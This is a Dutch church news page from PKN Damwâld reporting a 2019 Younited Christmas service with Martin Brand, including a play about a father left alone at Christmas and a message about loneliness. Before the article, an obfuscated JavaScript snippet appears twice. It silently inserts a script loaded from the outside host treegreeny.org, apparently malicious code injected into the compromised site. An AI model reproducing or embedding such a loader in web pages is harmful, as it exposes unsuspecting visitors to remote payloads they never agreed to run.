;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Younited viert kerst met Martin Brand - PKN Damwâld

Younited viert kerst met Martin Brand

Gepubliceerd op: maandag 16 december 2019

Kerst vier je samen, samen in een mooi volle kerk! Afgelopen zondagavond vond de kerstdienst van Younited plaats in de Ontmoeting! Een prachtig spektakel vol toneel, film en prachtige woorden en muziek van Martin Brand!

Het begon emotioneel, Heit was op het podium volledig klaar voor een gezellig kerstdiner. De hele familie zou komen en alles stond klaar. totdat iedereen een voor een afbelde, ze hadden het te druk, moesten werken of gingen op vakantie, ze lieten Heit alleen achter. Gebeurt dat ook in ons leven? Dat wij te druk zijn voor een ander? Dat wij maar door gaan zonder stil te staan dat echt contact belangrijk is? Martin vertelde over zijn eenzame periode die hij “onbewust” mee gemaakt heeft. Eenzaam zijn is lastig en kan het leven soms lastig maken. Gelukkig kwam iedereen op toneel tot inkeer dat ze Heit niet in de steek mochten laten, iedereen zij hun afspraak af en ging gezellig kerst vieren met Heit, want kerst vier je samen!

Het was een prachtige vrolijke dienst, met prachtige muziek en mooie woorden! Op naar kerst!

Vier jij kerst samen? en zorg jij dat niemand kerst alleen viert?!